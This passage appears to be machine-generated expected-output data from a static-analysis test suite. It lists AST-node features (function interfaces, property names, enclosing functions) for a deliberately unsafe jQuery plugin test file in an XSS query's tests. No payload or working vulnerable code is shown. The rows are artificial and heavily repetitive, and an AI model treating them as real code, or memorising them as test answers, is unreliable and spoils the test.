{\\n\\t\\tmen ... gin'\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:6 | menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:6 | menu | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:6 | menu | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:6 | menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:3:111:21 | menu: '
    ' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:9:111:21 | '
    ' | assignedToPropName | menu | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:9:111:21 | '
    ' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:9:111:21 | '
    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:9:111:21 | '
    ' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:111:9:111:21 | '
    ' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:8 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:8 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:8 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:3:112:22 | target: '.my_plugin' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:11:112:22 | '.my_plugin' | assignedToPropName | target | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:11:112:22 | '.my_plugin' | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:11:112:22 | '.my_plugin' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:11:112:22 | '.my_plugin' | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:112:11:112:22 | '.my_plugin' | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:114:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:118:2 | $.fn.my ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:118:2 | $.fn.my ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:118:2 | $.fn.my ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:2:118:2 | $.fn.my ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:4:114:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:4:114:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:4:114:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:4:114:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:7:114:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:7:114:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:7:114:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:7:114:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:114:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:114:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:114:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:114:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:19:118:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:28:114:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:28:114:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:28:114:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:28:114:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:114:38:114:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:9 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:9 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:9 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:9 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options ... ptions) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:3:115:58 | options ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:13 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:13 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:13 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:13 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:20 | $.extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:20 | $.extend | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:20 | $.extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:20 | $.extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | $.exten ... ptions) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | exceptional return of $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | exceptional return of $.exten ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | exceptional return of $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:13:115:58 | exceptional return of $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:15:115:20 | extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:15:115:20 | extend | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:15:115:20 | extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:15:115:20 | extend | fileImports | | | 